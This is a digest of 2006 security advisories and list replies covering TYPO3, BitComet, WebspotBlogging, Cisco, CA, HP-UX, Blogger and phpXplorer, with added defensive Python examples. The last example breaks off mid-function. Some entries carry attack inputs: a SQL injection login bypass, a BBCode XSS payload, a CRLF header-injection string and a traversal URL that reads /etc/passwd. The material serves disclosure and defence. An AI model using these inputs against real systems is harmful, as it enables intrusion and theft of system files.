HITBSecConf2005 Videos Released
Hi all,

After a long wait and a series of misadventures, we are pleased to announce the availability of the HITBSecConf2005 Kuala Lumpur videos. You can grab them here:

http://video.hitb.org/2005.html

The videos are distributed via the BitTorrent network and are broken down into two separate packages.

HITBSecConf2006 will be taking place this year from September 16th - 19th at The Westin Kuala Lumpur. Stay tuned for the CfP which will be announced sometime next month.

Cheers and enjoy the videos.

--Prabu
http://www.hackinthebox.org
IRM 015: File system path disclosure on TYPO3 Web Content Manager
-- IRM Security Advisory No. 015

File system path disclosure on TYPO3 Web Content Manager

Vulnerability Type / Importance: Information Leakage / Medium
Problem discovered: January 13th 2006
Vendor contacted: January 13th 2006
Advisory published: January 19th 2006
--

Abstract:

TYPO3 is a free Open Source content management system for enterprise purposes on the web and in intranets. It offers full flexibility and extendability while featuring an accomplished set of ready-made interfaces, functions and modules.

Description:

IRM has discovered an information leakage vulnerability in TYPO3 that allows remote users to disclose the file system path of the application when requesting certain files. The following files were found to disclose the application path:

http://hostname/typo3/t3lib/thumbs.php
http://hostname/tslib/showpic.php
http://hostname/t3lib/stddb/tables.php

Technical details:

The issue is due to the application failing to properly determine its own physical path and therefore trying to 'require()' a wrong class file.

From init.php, line 71:

define('PATH_thisScript', str_replace('//', '/', str_replace('\\', '/',
    (php_sapi_name() == 'cgi' || php_sapi_name() == 'isapi' || php_sapi_name() == 'cgi-fcgi')
        && ($_SERVER['ORIG_PATH_TRANSLATED'] ? $_SERVER['ORIG_PATH_TRANSLATED'] : $_SERVER['PATH_TRANSLATED'])
    ? ($_SERVER['ORIG_PATH_TRANSLATED'] ? $_SERVER['ORIG_PATH_TRANSLATED'] : $_SERVER['PATH_TRANSLATED'])
    : ($_SERVER['ORIG_SCRIPT_FILENAME'] ? $_SERVER['ORIG_SCRIPT_FILENAME'] : $_SERVER['SCRIPT_FILENAME']))));

From the PHP manual:

    You can define a constant by using the define()-function. Once a constant is defined, it can never be changed or undefined.

The vulnerable files listed above fail to include init.php and the 'PATH_thisScript' variable is locally calculated:

define('PATH_thisScript', str_replace('//', '/', str_replace('\\', '/',
    (php_sapi_name() == 'cgi' || php_sapi_name() == 'isapi' || php_sapi_name() == 'cgi-fcgi')
        && ($_SERVER['ORIG_PATH_TRANSLATED'] ? $_SERVER['ORIG_PATH_TRANSLATED'] : $_SERVER['PATH_TRANSLATED'])
    ? ($_SERVER['ORIG_PATH_TRANSLATED'] ? $_SERVER['ORIG_PATH_TRANSLATED'] : $_SERVER['PATH_TRANSLATED'])
    : ($_SERVER['ORIG_SCRIPT_FILENAME'] ? $_SERVER['ORIG_SCRIPT_FILENAME'] : $_SERVER['SCRIPT_FILENAME']))));
define('PATH_site', ereg_replace('[^/]*.[^/]*$', '', PATH_thisScript));
define('PATH_t3lib', PATH_site.'t3lib/');
define('PATH_tslib', PATH_site.'tslib/');

At this point, constants 'PATH_t3lib' and 'PATH_tslib' contain wrong values and any 'require()' function using these constants will not work and will disclose the file system path.

Tested Versions:

Version 3.7.1

Vendor Patch Information:

Contact was initially made via the TYPO3 bug reporting system on January 13th 2006. On January 14th a patch for the issue was published on the site (http://bugs.typo3.org/view.php?id=2248)

Workarounds:

IRM are not aware of any workarounds for this issue.

Credits:

Research & Advisory: Rodrigo Marcos

Disclaimer:

All information in this advisory is provided on an 'as is' basis in the hope that it will be useful. Information Risk Management Plc is not responsible for any risks or occurrences caused by the application of this information.

A copy of this advisory may be found at: http://www.irmplc.com/advisories.htm

--
Information Risk Management Plc.
Kings Building, Smith Square, London, United Kingdom SW1P 3JJ
+44 (0)207 808 6420
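The symptom the advisory describes is a failed require() printed by PHP with display_errors on, which carries the script's absolute path. The following detector is an added example, not IRM's or TYPO3's code: it scans an HTTP response body for PHP diagnostics and for any absolute filesystem path, so a scan of a site's error pages can flag path disclosure. The sample bodies are constructed for the example, not captured from a real install.

```python
import re

# Added example, not TYPO3 code: detect PHP error output that reveals the
# server's filesystem layout (a failed require() printed with display_errors on).

TAG_RE = re.compile(r"<[^>]+>")

# "Warning: <message> in <file> on line <n>" as PHP prints it; with
# html_errors the pieces are wrapped in <b> tags, which are stripped first.
PHP_ERROR_RE = re.compile(
    r"\b(?P<level>Warning|Fatal error|Notice|Parse error):\s*(?P<msg>.+?)"
    r"\s+in\s+(?P<file>\S+)\s+on\s+line\s+(?P<line>\d+)"
)

# Absolute Unix or Windows paths with at least two components; the lookbehind
# keeps the path part of URLs (http://host/...) from matching.
ABS_PATH_RE = re.compile(
    r"(?<![\w/])(?:/(?:[\w.\-]+/)+[\w.\-]+|[A-Za-z]:\\(?:[\w.\-]+\\)+[\w.\-]+)"
)


def php_errors(body):
    """Return each PHP diagnostic found in a response body, with file and line."""
    text = TAG_RE.sub("", body)
    return [
        {
            "level": m["level"],
            "message": m["msg"],
            "file": m["file"],
            "line": int(m["line"]),
        }
        for m in PHP_ERROR_RE.finditer(text)
    ]


def leaked_paths(body):
    """Every absolute filesystem path the body reveals, deduplicated and sorted."""
    return sorted(set(ABS_PATH_RE.findall(TAG_RE.sub("", body))))


def discloses_path(body):
    """True when the body leaks at least one absolute path."""
    return bool(leaked_paths(body))


# Constructed sample bodies (not captured from a real TYPO3 install).
SAMPLE_LEAKY = (
    "<br />\n<b>Warning</b>:  require(/var/www/site/t3lib/class.t3lib_div.php): "
    "failed to open stream: No such file or directory in "
    "<b>/var/www/site/typo3/t3lib/thumbs.php</b> on line <b>71</b><br />\n"
)
SAMPLE_CLEAN = "<html><body>Image not found.</body></html>"

if __name__ == "__main__":
    for err in php_errors(SAMPLE_LEAKY):
        print(f"{err['level']} in {err['file']}:{err['line']}")
    print("leaked:", leaked_paths(SAMPLE_LEAKY))
    print("clean page discloses:", discloses_path(SAMPLE_CLEAN))
```

The same check works as a regression test after applying the vendor patch or after setting display_errors off: fetch each of the three URLs from the advisory and assert that discloses_path() is False on the body.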
Fortinet Advisory: BitComet URI Buffer Overflow Vulnerability
Fortinet Security Advisory: FSA-2006-07

BitComet URI Buffer Overflow Vulnerability

Advisory Date     : January 18, 2006
Reported Date     : November 29, 2005
Vendor            : BitComet
Affected Products : BitComet v0.60
Severity          : High
Reference         : http://www.bitcomet.com/doc/download.htm

Description:

Fortinet Security Research Team (FSRT) has discovered a URI buffer overflow vulnerability in the BitComet P2P Client software. It indicates a possible exploit of buffer overflow vulnerability in BitComet. BitComet is one of the most popular P2P Clients for file sharing, which uses the bittorrent protocol. There is a bug in BitComet: a remote attacker could construct a special .torrent file and put it on any bt publish web site. When a user downloads the .torrent file and clicks on the publisher's name, BitComet will crash. An attacker can run arbitrary commands on the victim's host by a specially crafted .torrent file.

Impact : Execute arbitrary code

Solution : BitComet has released an update for this vulnerability, which is available for downloading from BitComet's web site.

Fortinet Protection: FortiGate series of security systems have been updated to detect exploits targeting this vulnerability.

Acknowledgment : Dejun Meng of Fortinet Security Research team found this vulnerability.

Disclaimer : Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. More specific information is available on request from Fortinet. Please note that Fortinet's product information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing.
[eVuln] WebspotBlogging Authentication Bypass Vulnerability
New eVuln Advisory:
WebspotBlogging Authentication Bypass Vulnerability
http://evuln.com/vulns/41/summary.html

--------Summary--------
Software: WebspotBlogging
Software's Web Site: http://www.webspot.co.uk/
Versions: 3.0
Critical Level: Dangerous
Type: SQL Injection
Class: Remote
Status: Unpatched
Exploit: Available
Solution: Not Available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
eVuln ID: EV0041

-----Description-----
Vulnerable script: login.php

Variable $_POST[username] isn't properly sanitized before being used in a SQL query. This can be used to make any SQL query by injecting arbitrary SQL code.

Condition: gpc_magic_quotes - off

Administrator has an ability to import themes using php code insertion from Admin Control Panel. System access is possible.

--------Exploit--------
Available at: http://evuln.com/vulns/41/exploit.html

--------Solution--------
No Patch available.

--------Credit--------
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
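The advisory's condition (magic_quotes_gpc off) shows why quote-escaping is the wrong layer for the fix: the username still reaches the SQL parser as text. The following is an added example, not WebspotBlogging's code, written in Python against an in-memory SQLite table with one constructed account. It places the concatenating login next to the parameterized one so the difference can be checked on the same inputs.

```python
import hashlib
import sqlite3

# Added example, not WebspotBlogging code: the login pattern the advisory
# describes (username spliced into SQL text) next to the parameterized form.


def pw_hash(password):
    """Unsalted SHA-256 keeps the example short; use a password KDF in practice."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_db():
    """In-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", pw_hash("correct horse")))
    return conn


def login_vulnerable(conn, username, password):
    """Quotes in `username` reach the SQL parser, the flaw login.php exposes
    when magic_quotes_gpc is off."""
    sql = (
        "SELECT username FROM users WHERE username = '%s' AND pw_hash = '%s'"
        % (username, pw_hash(password))
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Bound parameters: the value travels separately from the statement text,
    so the input can never change the query's structure."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, pw_hash(password)),
    ).fetchone()
    return row[0] if row else None


# Constructed inputs: a real login, and a username carrying a quote and a SQL
# line comment, which drops the password clause from the concatenated query.
GOOD = ("admin", "correct horse")
INJECTED = ("admin' --", "not the password")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, *GOOD), login_vulnerable(db, *INJECTED))
    print("safe:      ", login_safe(db, *GOOD), login_safe(db, *INJECTED))
```

With the concatenating version the injected username logs in as admin without the password; the parameterized version returns None because the whole string, quote and comment included, is compared as a username value.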
Cisco Security Advisory: Cisco Call Manager Privilege Escalation
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Cisco Security Advisory: Cisco Call Manager Privilege Escalation

Advisory ID: cisco-sa-20060118-ccmpe

http://www.cisco.com/warp/public/707/cisco-sa-20060118-ccmpe.shtml

Revision 1.0

For Public Release 2006 January 18 1600 UTC (GMT)

- ---------------------------------------------------------------------

Contents
========

    Summary
    Affected Products
    Details
    Impact
    Software Versions and Fixes
    Workarounds
    Obtaining Fixed Software
    Exploitation and Public Announcements
    Status of This Notice: FINAL
    Distribution
    Revision History
    Cisco Security Procedures

- ---------------------------------------------------------------------

Summary
=======

Cisco CallManager (CCM) is the software-based call-processing component of the Cisco IP telephony solution which extends enterprise telephony features and functions to packet telephony network devices such as IP phones, media processing devices, voice-over-IP (VoIP) gateways, and multimedia applications.

Cisco CallManager versions with Multi Level Administration (MLA) enabled may be vulnerable to privilege escalations, which may result in read-only users gaining administrative access.

Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability.

This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20060118-ccmpe.shtml.

Affected Products
=================

Vulnerable Products
+------------------

These Cisco CallManager versions with Multi Level Administration (MLA) enabled are vulnerable:

  * Cisco CallManager 3.2 and earlier
  * Cisco CallManager 3.3, versions earlier than 3.3(5)SR1
  * Cisco CallManager 4.0, versions earlier than 4.0(2a)SR2c
  * Cisco CallManager 4.1, versions earlier than 4.1(3)SR2

No other Cisco products are currently known to be affected by these vulnerabilities.

Complete this procedure to check if Multi Level Administration is enabled:

 1. Access CCM Administration with this URL: http://CCMServer/ccmadmin, where CCMServer specifies the IP address or name of the Cisco CallManager server.
 2. Choose User > Access Rights > Configure MLA Parameters. The MLA Enterprise Parameter Configuration page displays.
 3. MLA is enabled if the Enable MultiLevelAdmin enterprise parameter is set to True.

Details
=======

An administrative user with read-only permission can use a crafted URL on the CCMAdmin web page to escalate privileges to a full administrative level.

This vulnerability applies to users who are authenticated to the read-only administrative level. Users with no administrative access and users with full administrative permissions continue to work as expected.

Administrative users with access privilege Read Only should not be confused with the standard User Group named Read Only which is created at installation. For further details on user groups and assigning access privileges, please refer to this URL:
http://www.cisco.com/en/US/products/sw/voicesw/ps556/products_administration_guide_chapter09186a00803ed6ea.html#wp1022471.

  * CSCef75361, CSCsb12765, CSCsb88649, CSCsc26275 -- CCMAdmin Read Only User Can Escalate Privileges

Impact
======

Successful exploitation of the vulnerability may result in privilege escalation where read-only administrative users can gain full administrative privileges and create, delete, or reset devices.

Software Versions and Fixes
===========================

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.

Each row of the Cisco CallManager software table (below) describes a release train which will address all of the vulnerabilities mentioned in this advisory. If a given release train is vulnerable, then the earliest possible releases that contain the fixes (the First Fixed Release) and the anticipated date of availability for each are listed in the Engineering Special, Service Release, and Maintenance Release columns. A device running a Cisco CallManager release in the given train that is earlier than the release in a specific column (less than the First Fixed Release listed in the Engineering Special or Special Release column) is known to be vulnerable to one or more issues. The Cisco CallManager should be upgraded at least to the indicated release or a later version (greater than or equal to the First Fixed Release label).
Re: Re: MSN Messenger Password Decrypter for WinXP/2003
Hi,

This is the author of the MSN Messenger Password Recovery tool. Searched in Google and found this post.

I would like to assure you that this program is not dangerous and does not perform any illegal actions. All it does is read the registry values and decrypt them.

What's wrong with using UPX?

As far as the link at the bottom is concerned - we are in the process of making the Skype tool and will put a proper website in place once we are finished.

Also, regarding your message that this program is malicious:

http://www.softpedia.com/progClean/MSN-Messenger-Password-Recovery-Clean-32261.html

MSN Messenger Password Recovery 1.1.100.2006 - SOFTPEDIA 100% CLEAN AWARD
This software product was tested in the Softpedia labs on: 18 January 2006
CAID 33756 - DM Deployment Common Component Vulnerabilities
Title: CAID 33756 - DM Deployment Common Component Vulnerabilities

CA Vulnerability ID: 33756

Discovery Date: 2005-12-20
CA Advisory Date: 2006-01-17

Discovered By: Cengiz Aykanat (CA internal audit), and Karma[at]DesignFolks[dot]com[dot]au.

Impact: Remote attacker can cause a denial of service condition.

Summary: The following security vulnerability issues have been identified in the DM Primer part of the DM Deployment Common Component being distributed with some CA products:

1) A Denial of Service (DoS) vulnerability has been identified in the handling of unrecognized network messages, which may result in high CPU utilization and excessive growth of the DM Primer log file.

2) A Denial of Service (DoS) vulnerability has been identified with the way in which DM Primer handles receipt of large rogue network messages, which can result in DM Primer becoming unresponsive.

Severity: Computer Associates has given this vulnerability a Medium risk rating.

Mitigating Factors: These vulnerabilities will only be present if you have utilized the DM Deployment mechanism (bundled with the affected products) to deploy those products within your enterprise environment.

Affected Technologies: Please note that the DM Primer component is not a product, but rather a common component that is included with multiple products. Vulnerable versions of the DM Primer component are included in the CA products listed in the Affected Products section below. DM Primer component versions v1.4.154 and v1.4.155 are vulnerable to these issues. These vulnerabilities are not present in DM Primer v11.0 or later.

Affected Products:
- BrightStor Mobile Backup r4.0
- BrightStor ARCserve Backup for Laptops & Desktops r11.0, r11.1, r11.1 SP1
- Unicenter Remote Control 6.0, 6.0 SP1
- CA Desktop Protection Suite r2
- CA Server Protection Suite r2
- CA Business Protection Suite r2
- CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2
- CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2
- CA Business Protection Suite for Midsize Business for Windows r2

Affected platforms: Windows

Platforms NOT affected: This version of DM Primer is not supported on any other platforms.

Status and Recommendation: Since this version of DM Primer is only utilized for the initial installation of the products, the above vulnerabilities can be addressed by simply removing the DM Primer Service after deployment.

To remove the DM Primer component follow the instructions below:

  dmprimer remove -f
    will force the removal of a local DM Primer service,

  dmsweep -a1:remotecomp -dp:force
    will force the removal of the DM Primer service from a remote computer called remotecomp.

The dmsweep command will be available on the DM Deployment machine (usually the host for the product manager with which it was bundled). It can take a machine name, an ip address, or a range of ip addresses. Some examples are:

  dmsweep -a1:192.168.0.* -dp:force
    will forcibly remove DM Primer from all machines on the 192.168.0.* subnet

  dmsweep -a1:192.168.0.1 -a2:192.168.0.100 -dp:force
    will forcibly remove DM Primer from all machines in the range 192.168.0.1-192.168.0.100

Please refer to the FAQ for answers to commonly asked questions.
http://supportconnectw.ca.com/public/ca_common_docs/dmdeploysecurity-faqs.asp

References: (note that URLs may wrap)

DM Deployment Common Component Security Notice
http://supportconnectw.ca.com/public/ca_common_docs/dmdeploysecurity_notice.asp

Frequently Asked Questions (FAQ) related to this security update
http://supportconnectw.ca.com/public/ca_common_docs/dmdeploysecurity-faqs.asp

CA Security Advisor site advisory
http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33756

CVE Reference: Pending
http://cve.mitre.org

OSVDB Reference: Pending
http://osvdb.org

Error Handling in DM Primer
http://www.designfolks.com.au/karma/DMPrimer/

Customers who require additional information should contact CA Technical Support at http://supportconnect.ca.com.

For technical questions or comments related to this advisory, please send email to [EMAIL PROTECTED], or contact me directly.

If you discover a vulnerability in CA products, please report your findings to [EMAIL PROTECTED], or utilize our Submit a Vulnerability form.
URL: http://www3.ca.com/securityadvisor/vulninfo/submit.aspx

Regards,
Ken Williams ; 0xE2941985
Dir. Vuln Research
CA Vulnerability Research Team

CA, One Computer Associates Plaza. Islandia, NY 11749
Contact http://www3.ca.com/contact/
Legal Notice http://ca.com/calegal.htm
Privacy Policy http://www.ca.com/caprivacy.htm
Copyright 2006 CA. All rights reserved.
Google's Blogger.com classic HTTP response splitting vulnerability
Blogger.com classic HTTP response splitting vulnerability
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0. Original Advisory
~~~~~~~~~~~~~~~~~~~~
http://o0o.nu/~meder/o0o_Blogger_HTTP_response_splitting.txt

I. Background
~~~~~~~~~~~~~
Blogger.com is Google's blogging service.

II. Description
~~~~~~~~~~~~~~~
Blogger's personal page redirection mechanism contains a classic HTTP response splitting vulnerability in the Location HTTP header. The problem occurs due to use of unsanitized user-supplied data in the Location HTTP header, which enables an attacker to inject CRLF (%0d%0a) characters, thus splitting the server's response and taking full control over the contents of the second HTTP response. Exploitation of the vulnerability can lead to cross-site scripting (XSS), cache poisoning and phishing attacks.

The following URL was taking the contents of the query string and using it in the Location HTTP header without proper sanitation:

http://www.blogger.com/r?[URL here]

III. Vendor status
~~~~~~~~~~~~~~~~~~
Vulnerability has been fixed on 13/01/2006

IV. Disclosure timeline
~~~~~~~~~~~~~~~~~~~~~~~
02/01/2006 - Issue discovered. Vendor notified.
02/01/2006 - Initial vendor response.
12/01/2006 - Vendor inquired on status.
13/01/2006 - Vendor response and confirmation that bug fixed.

V. References
~~~~~~~~~~~~~
1. http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf

--
http://o0o.nu/~meder
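The defence for a redirector like the one described above is to treat the query string as data that must never carry a line break into the header, and to limit where the redirect may go. The following is an added example, not Blogger's or Google's code: it percent-decodes the target once (so %0d%0a is inspected as the CR LF it becomes), refuses control and non-ASCII characters, restricts the scheme and host to a hypothetical allow-list, and only then serializes the 302. A small counting helper shows how a proxy or log scanner can tell a single response from a split one. All inputs are constructed for the example.

```python
from urllib.parse import unquote, urlsplit

# Added example, not Blogger code: validate a user-supplied redirect target
# before it is placed in a Location header.

ALLOWED_HOSTS = {"www.blogger.com", "blogger.com"}  # assumption for the example


class UnsafeRedirect(ValueError):
    pass


def validate_redirect_target(raw):
    """Return the decoded target, or raise UnsafeRedirect.

    One round of percent-decoding is applied so that %0d%0a is seen as CR LF;
    anything below 0x20, DEL, or non-ASCII is refused, since each of those can
    terminate or corrupt the header line in some server or proxy.
    """
    target = unquote(raw)
    if not target.isascii() or any(ord(c) < 0x20 or ord(c) == 0x7F for c in target):
        raise UnsafeRedirect("control or non-ASCII character in redirect target")
    parts = urlsplit(target)
    if parts.scheme not in ("http", "https") or parts.hostname not in ALLOWED_HOSTS:
        raise UnsafeRedirect("redirect target outside the allowed hosts")
    return target


def is_rejected(raw):
    """True when validate_redirect_target refuses the input."""
    try:
        validate_redirect_target(raw)
    except UnsafeRedirect:
        return True
    return False


def build_redirect(raw):
    """Serialize a 302 whose Location is the validated target."""
    target = validate_redirect_target(raw)
    return (
        b"HTTP/1.1 302 Found\r\n"
        b"Location: " + target.encode("ascii") + b"\r\n"
        b"Content-Length: 0\r\n\r\n"
    )


def response_count(raw_response):
    """Detection helper: number of HTTP status lines in a byte string. A
    well-formed single response yields 1; a split response yields more."""
    return sum(1 for line in raw_response.split(b"\r\n") if line.startswith(b"HTTP/1."))


# Constructed inputs: a legitimate target and forms that must be refused.
LEGIT = "http://www.blogger.com/home"
CRLF = "http://www.blogger.com/%0d%0aX-Injected: 1"
OFFSITE = "http://example.org/"
BAD_SCHEME = "ftp://www.blogger.com/x"

if __name__ == "__main__":
    print(build_redirect(LEGIT).decode())
    for raw in (CRLF, OFFSITE, BAD_SCHEME):
        print(raw, "->", "rejected" if is_rejected(raw) else "accepted")
```

Decoding exactly once matches what the server does before the value reaches the header; rejecting rather than stripping the bad characters avoids a second class of bugs where a sanitizer's output is itself re-decoded downstream.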
Re: IRM 015: File system path disclosure on TYPO3 Web Content Manager
On Thu, Jan 19, 2006 at 10:30:36AM -, Advisories wrote:
> File system path disclosure on TYPO3 Web Content Manager
> Vulnerability Type / Importance: Information Leakage / Medium

Hm, since when is path disclosure medium importance?

> The following files were found to disclose the application path:
> http://hostname/typo3/t3lib/thumbs.php
> http://hostname/tslib/showpic.php
> http://hostname/t3lib/stddb/tables.php
> Tested Versions: Version 3.7.1

The first one verified as applicable to 3.8.1 too (easily avoidable by adding IP- or user-based access restriction to /typo3 since that's the administrative backend anyways), and the rest doesn't disclose anything on a properly configured (at least display_errors-wise) webserver, which is a documented recommended (and often reiterated everywhere) PHP setup.

> Workarounds: IRM are not aware of any workarounds for this issue.

Ouch. :)

--
WBR, Michael Shigorin [EMAIL PROTECTED]
-- Linux.Kiev http://www.linux.kiev.ua/
[security bulletin] SSRT5971 rev.1 - HP-UX Running ftpd Remote Denial of Service (DoS)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c00592668
Version: 1

HPSBUX02092 SSRT5971 rev.1 - HP-UX Running ftpd Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2006-01-17
Last Updated: 2006-01-18

Potential Security Impact: Remote Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
A potential security vulnerability has been identified with HP-UX running ftpd. The vulnerability could be exploited by a remote unauthorized user to cause ftpd to become unresponsive, leading to a Denial of Service (DoS).

References: None

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
HP-UX B.11.00, B.11.04, B.11.11, B.11.23 running ftpd

BACKGROUND

To determine if an HP-UX system has an affected version, search the output of swlist -a revision -l fileset for one of the filesets listed below. For affected systems verify that the recommended action has been taken.

AFFECTED VERSIONS

HP-UX B.11.23
=============
InternetSrvcs.INETSVCS2-RUN
action: install PHNE_33414 or subsequent

HP-UX B.11.11
=============
InternetSrvcs.INETSVCS2-RUN
action: install PHNE_33412 or subsequent

HP-UX B.11.11
=============
WUFTP-26.INETSVCS-FTP
action: install revision B.11.11.01.006 or subsequent.

HP-UX B.11.04
=============
InternetSrvcs.INETSVCS-RUN
action: install PHNE_34077 or subsequent

HP-UX B.11.00
=============
InternetSrvcs.INETSVCS-RUN
action: install PHNE_33406 or subsequent

HP-UX B.11.00
=============
WUFTP-26.INETSVCS-FTP
action: install revision B.11.00.01.005 or subsequent.

END AFFECTED VERSIONS

RESOLUTION

HP has made the following patches available to resolve the issue for the InternetSrvcs product. The patches can be downloaded from http://itrc.hp.com

B.11.23 - PHNE_33414 or subsequent
B.11.11 - PHNE_33412 or subsequent
B.11.04 - PHNE_34077 or subsequent
B.11.00 - PHNE_33406 or subsequent

HP has made the following software updates available to resolve the issue for the WUFTP-26 product. The software updates can be downloaded from http://www.hp.com/go/softwaredepot

B.11.11 - revision B.11.11.01.006 or subsequent.
B.11.00 - revision B.11.00.01.005 or subsequent.

MANUAL ACTIONS: Yes - Update
B.11.23, B.11.04 - No manual actions.
B.11.11, B.11.00 - InternetSrvcs - No manual actions.
B.11.11, B.11.00 - WUFTP-26 - Install software updates.

PRODUCT SPECIFIC INFORMATION

HP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. For more information:
http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA

HISTORY
Version:1 (rev.1) - 18 January 2006 Initial release

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: [EMAIL PROTECTED]
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
  To: [EMAIL PROTECTED]
  Subject: get key

Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA; langcode=USENGjumpid=in_SC-GEN__driverITRCtopiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit:
http://www.itrc.hp.com/service/cki/secBullArchive.do

* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

GN = HP General SW, MA = HP Management Agents, MI = Misc. 3rd party SW, MP = HP MPE/iX, NS = HP NonStop Servers, OV = HP OpenVMS, PI = HP Printing & Imaging, ST = HP Storage SW, TL = HP Trusted Linux, TU = HP Tru64 UNIX, UX = HP-UX, VV = HP Virtual Vault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

HP is broadly distributing this Security Bulletin
Phpclanwebsite BBCode IMG Tag XSS Vulnerability
##Night_Warrior Kurdish Hacker
##night_warrior771[at]hotmail.com
##Phpclanwebsite BBCode IMG Tag XSS Vulnerability
##Contact : night_warrior771[at]hotmail.com
##homepage : www.phpclanwebsite.com

Vulnerable:

[img]javascript:alert('XSS')[/img]

Contact : night_warrior771[at]hotmail.com

Night_Warrior
Re: Directory traversal in phpXplorer
Hey,

I just wanted to point out a couple of things I neglected to mention in my first reply to this advisory:

1) Even if something isn't a critical problem, a vendor should still respond to the issue, if for no other reason than to straighten out the situation with the user who had enough insight to spot it and assume it's a problem.

2) Only reporting a bug between Dec 20 - Jan 4 is bad practice, I think. The advisory noted those two dates as when the vendor was sent an advisory. As most people know this period of time is considered Christmas and New Years vacation in the USA and other places. Beyond that the phpXplorer project is an open source project and may not have dedicated support.

In short a little more leeway should be profited during the holidays and vendors should always respond to issues like this so no one gets hung out to dry like this.

Best Regards,
Stan Bubrouski

On 1/16/06, Stan Bubrouski [EMAIL PROTECTED] wrote:
> Seeing as phpXplorer allows the upload and editing of live PHP files anyways it seems to me this exploit is completely useless. You can use the script as intended to cat the password file if you want. Right?
>
> -sb
>
> On 1/16/06, Oriol Torrent [EMAIL PROTECTED] wrote:
> > ==================================================
> > Title: Directory traversal in phpXplorer
> > Application: phpXplorer
> > Vendor: http://www.phpxplorer.org
> > Vulnerable Versions: 0.9.33
> > Bug: directory traversal
> > Date: 16-January-2006
> > Author: Oriol Torrent Santiago oriol.torrent.AT.gmail.com
> > References: http://www.arrelnet.com/advisories/adv20060116.html
> > ==================================================
> >
> > 1) Background
> > -------------
> > phpXplorer is an open source file management system written in PHP. It enables you to work on a remote file system through a web browser.
> >
> > 2) Problem description
> > ----------------------
> > An attacker can read arbitrary files outside the web root by sending specially formed requests
> >
> > Ex:
> > http://host/phpXplorer/system/workspaces.php?sShare=../../../../../../../../etc/passwd%00ref=1
> >
> > 3) Solution:
> > ------------
> > No Patch available.
> >
> > 4) Timeline
> > -----------
> > 17/12/2005 Bug discovered
> > 20/12/2005 Vendor receives detailed advisory. No response
> > 04/01/2006 Second notification. No response
> > 16/01/2006 Public Disclosure
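The quoted advisory's request combines two tricks: "../" segments that climb out of the share directory, and a %00 byte that makes C-level file APIs drop whatever suffix the script appends after the user-supplied name. The confinement check below is an added example, not phpXplorer's code; the share root it uses is a hypothetical path, and the requests it is run against are constructed for the example. It decodes the parameter once, as the web server would, then rejects NUL bytes, absolute paths and anything that normalizes outside the root.

```python
import posixpath
from urllib.parse import unquote

# Added example, not phpXplorer code: confine a user-supplied share path to a
# configured root directory.

SHARE_ROOT = "/srv/phpXplorer/shares"  # hypothetical location for the example


class PathRejected(ValueError):
    pass


def resolve_share(requested, root=SHARE_ROOT):
    """Map a requested relative path to an absolute path under `root`.

    The request is percent-decoded once, then checked for the two tricks in
    the advisory's URL: a NUL byte (which truncates the path in C-level file
    APIs, discarding any suffix the script appends) and '..' segments that
    climb out of the root.
    """
    decoded = unquote(requested)
    if "\x00" in decoded:
        raise PathRejected("NUL byte in path")
    if decoded.startswith("/") or "\\" in decoded:
        raise PathRejected("absolute or backslash path")
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # Lexical containment check. A deployment should additionally realpath()
    # both sides so that symlinks inside the root cannot point outside it.
    if candidate != root and not candidate.startswith(root + "/"):
        raise PathRejected("path escapes the share root")
    return candidate


def safe_to_open(requested, root=SHARE_ROOT):
    """True when resolve_share accepts the request."""
    try:
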